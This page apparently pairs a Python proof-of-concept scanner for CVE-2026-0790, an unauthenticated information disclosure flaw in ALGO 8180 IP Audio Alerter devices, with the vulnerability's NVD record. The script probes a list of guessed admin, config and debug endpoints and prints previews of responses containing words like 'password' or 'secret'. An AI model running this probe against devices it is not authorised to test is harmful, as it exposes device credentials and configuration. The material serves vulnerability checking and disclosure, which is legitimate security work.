CVE-2026-0790

# CVE-2026-0790 PoC - ALGO 8180 IP Audio Alerter Information Disclosure # Vulnerability: Direct Request to Sensitive Endpoints # CVSS: 7.5 (High) - No Authentication Required import requests import sys import json from urllib.parse import urljoin class CVE20260790POC: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (compatible; CVE-Scanner/1.0)' }) def check_vulnerability(self): """Check if target is vulnerable to CVE-2026-0790""" # Common sensitive endpoints that may be accessible without auth sensitive_endpoints = [ '/admin/', '/admin/settings', '/status/', '/status/network', '/config/', '/config/system', '/api/status', '/api/config', '/cgi-bin/status', '/cgi-bin/config', '/debug/', '/diagnostics/', '/main.html', '/settings.html', '/network.html' ] vulnerable_endpoints = [] print(f'[*] Scanning target: {self.target_url}') print(f'[*] Testing {len(sensitive_endpoints)} endpoints...\n') for endpoint in sensitive_endpoints: try: url = urljoin(self.target_url, endpoint) response = self.session.get(url, timeout=10, verify=False) if response.status_code == 200: content_length = len(response.content) content_preview = response.text[:200].replace('\n', ' ') # Check if response contains sensitive keywords sensitive_keywords = ['password', 'username', 'ip', 'config', 'serial', 'admin', 'secret', 'key', 'credential'] has_sensitive = any(kw.lower() in response.text.lower() for kw in sensitive_keywords) if has_sensitive: print(f'[+] VULNERABLE: {endpoint}') print(f' Status: {response.status_code}') print(f' Size: {content_length} bytes') print(f' Preview: {content_preview}...') print() vulnerable_endpoints.append({ 'endpoint': endpoint, 'status_code': response.status_code, 'content_length': content_length }) else: print(f'[*] Accessible: {endpoint} (may contain info)') except requests.exceptions.RequestException as e: print(f'[-] Error accessing {endpoint}: {str(e)}') return vulnerable_endpoints def generate_report(self, results): """Generate vulnerability report""" report = { 'cve_id': 'CVE-2026-0790', 'target': self.target_url, 'vulnerable': len(results) > 0, 'vulnerable_endpoints': results, 'recommendation': 'Apply vendor patch or restrict web access' } return report if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve_2026_0790_poc.py <target_url>') print('Example: python cve_2026_0790_poc.py http://192.168.1.100') sys.exit(1) target = sys.argv[1] poc = CVE20260790POC(target) results = poc.check_vulnerability() report = poc.generate_report(results) print('\n' + '='*60) print('VULNERABILITY REPORT') print('='*60) print(json.dumps(report, indent=2)) if results: print('\n[!] Target is VULNERABLE to CVE-2026-0790') else: print('\n[*] No vulnerable endpoints found')

{"cve": {"id": "CVE-2026-0790", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:06.720", "lastModified": "2026-02-13T20:32:36.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter Web UI Direct Request Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based user interface. By navigating directly to a URL, a user can gain unauthorized access to data. An attacker can leverage this vulnerability to disclose information in the context of the device. Was ZDI-CAN-28299."}, {"lang": "es", "value": "Vulnerabilidad de revelación de información por solicitud directa en la interfaz de usuario web de ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos revelar información sensible en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. La autenticación no es requerida para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la interfaz de usuario basada en web. Al navegar directamente a una URL, un usuario puede obtener acceso no autorizado a datos. Un atacante puede aprovechar esta vulnerabilidad para revelar información en el contexto del dispositivo. Fue ZDI-CAN-28299."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-012/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}